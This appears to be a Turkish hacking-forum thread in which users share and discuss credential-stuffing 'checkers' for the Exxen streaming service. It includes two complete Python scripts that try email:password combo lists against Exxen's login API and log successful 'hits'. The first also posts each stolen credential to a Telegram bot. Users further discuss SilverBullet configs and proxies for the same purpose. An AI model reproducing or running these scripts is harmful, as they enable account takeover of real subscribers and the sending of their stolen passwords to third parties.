toolun adını verir misin? yada paylaşabilirmisinhayır hazır toolda api buldum çalışıp çalışmadığını nerden anlayacam yada genel olarak apilerin çalışıp çalışmadıklarını gösteren birşey varmı site vs?
eğer api şeyini anlarsam belki yapmaya çalışırım
çalışıyorsa atsana kralexxen checker istiyosan atıyım açık kodlu incelersin
tgde paylaşılmış bir tooltoolun adını verir misin? yada paylaşabilirmisin
reklam olabilcek yerleri kaldırdımimport requests
import time
import os
import uuid
from colorama import Fore, Style
def clear():
os.system('clear')
def generate_guid():
return str(uuid.uuid4())
# Collect input from the user
combo = input(Fore.YELLOW + ' Combo Dosyasının Yolunu Giriniz >>> ' + Style.RESET_ALL)
tok = (Fore.WHITE + 'TOKEN' + Style.RESET_ALL)
ID = (Fore.GREEN + 'İD' + Style.RESET_ALL)
clear()
print(Fore.GREEN + ' ' + Fore.YELLOW +
'\n╔══════════════════════════════════' +
'\n╚══════════════════════════════════' +
'\n <EXXEN CHECKER>' + Style.RESET_ALL)
# Function to check the credentials
def check(email, password):
client = requests.session()
headers = {
'Host': 'api-crm.exxen.com',
'Origin': 'com.exxen.ios',
'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Exxen/1.0.23 (com.exxen.ios; build:5; iOS 15.5.0) Alamofire/5.4.4',
'Accept-Language': 'tr-TR;q=1.0',
'Cache-Control': 'no-cache',
'Connection': 'close'
}
data = {
'Email': email,
'Password': password,
'RememberMe': 'true'
}
try:
response = client.post(
'Linkleri görebilmek için kayıt olmanız gerekmektedir',
data=data,
headers=headers
)
time.sleep(1)
theos = f'''\n @
-------------------------------------
EXXEN HİT DÜŞTÜ
Gmail: {email}
Pass: {password}
Owner: @
Channel: @
---------------------------------------------
@/ @'''
tlg = f'Linkleri görebilmek için kayıt olmanız gerekmektedir{tok}/sendMessage?chat_id={ID}&text={theos}'
if 'Success":false' in response.text:
print(Fore.RED + f' Başarısız: {email}:{password}' + Style.RESET_ALL)
elif 'Success":true' in response.text:
print(Fore.YELLOW + f' Hits: {email}:{password}' + Style.RESET_ALL)
with open('C:/Users/PC/Desktop/gng/EmrHit.txt', 'a') as filee:
filee.write(theos)
requests.post(tlg)
else:
print(Fore.RED + f' Hata : {response.text}' + Style.RESET_ALL)
except requests.RequestException as e:
print(Fore.RED + f' Hata : {e}' + Style.RESET_ALL)
try:
with open(combo, 'r', encoding='utf-8') as file: # 'utf-8' kodlamasını ekledim
for line in file:
seq = line.strip()
acc = seq.split(':')
if len(acc) == 2:
check(acc[0], acc[1])
else:
print(Fore.RED + f' Bilinmeyen Format: {line}' + Style.RESET_ALL)
except FileNotFoundError:
print(Fore.RED + ' Combo Dosyası Bulunamadı!' + Style.RESET_ALL)
except UnicodeDecodeError as e:
print(Fore.RED + f' Unicode Decode Error: {e}' + Style.RESET_ALL)
import requests, base64, timeçalışıyorsa atsana kral
tgde paylaşılmış bir tool
reklam olabilcek yerleri kaldırdım
bununla 2 saat proxysiz ugrasacaginiza config ile captureli checkleyebilirsinizimport requests, base64, time
import requests, json, time
from cfonts import render
T, H, Z, Q, X = '\033[1;32m', '\033[1;36m', '\033[1;31m', '\033[1;36m', '\033[1;33m'
exxen_hit_tho = "t5omas_exxen_hit.txt"
output = render('EXXEN', colors=['white', 'blue'], align='center')
print("\x1b[1;39m—" * 60)
print(output)
print("\x1b[1;39m—" * 60)
print("~ Programmer :TG @T5OMAS")
print("\x1b[1;39m—" * 60)
def exxo(username, password):
user_pass = base64.b64encode(f"{username}:{password}".encode()).decode()
login_url = "Linkleri görebilmek için kayıt olmanız gerekmektedir"
login_headers = {
"accept": "application/json,text/plain,*/*", "accept-encoding": "gzip,deflate,br,zstd", "accept-language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
"authorization": f"Basic {user_pass}", "content-type": "application/json", "origin": "Linkleri görebilmek için kayıt olmanız gerekmektedir", "referer": "Linkleri görebilmek için kayıt olmanız gerekmektedir",
"sec-ch-ua": "\"Google Chrome\";v=\"131\",\"Chromium\";v=\"131\",\"Not_A Brand\";v=\"24\"", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"Windows\"",
"user-agent": "Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/131.0.0.0Safari/537.36"
}
login_payload = {"deviceDetails": {"deviceName": "Chrome", "deviceType": "Desktop", "modelNo": "131.0.0.0", "serialNo": "131.0.0.0", "brand": "Chrome", "os": "Windows", "osVersion": "10"}}
try:
response = requests.post(login_url, headers=login_headers, json=login_payload, timeout=10)
if response.status_code == 200 and response.json().get("bearer", {}).get("auth", {}).get("token"):
return True
except requests.exceptions.RequestException as e:
print(f"ban ..")
time.sleep(2)
return False
def thomas(combo):
with open(combo, "r") as file:
for line in file:
username, password = line.strip().split(":")
if exxo(username, password):
with open(exxen_hit_tho, "a") as hit:
hit.write(f"{username}:{password}\n")
print("\x1b[1;39m—" * 60)
print(f"Giriş başarılı: {username}:{password}")
else:
print(f"Giriş başarısız: {username}:{password}")
print("\x1b[1;39m—" * 60)
combo = input(" ~ Combo: ")
thomas(combo)
config varmı hiç peki ve silver bulletten mi bahsediyorsunbununla 2 saat proxysiz ugrasacaginiza config ile captureli checkleyebilirsiniz
evetconfig varmı hiç peki ve silver bulletten mi bahsediyorsun
atabilir misin
Api patlak kral.bi apinin çalışıp çalışmadığını neyle anlayabilirim acaba (Linkleri görebilmek için kayıt olmanız gerekmektedir)
silver bulletin en temiz versiyonu varmı hiç ana pcden açıcamda ona göre
vmde acarsin bisey olmazsilver bulletin en temiz versiyonu varmı hiç ana pcden açıcamda ona göre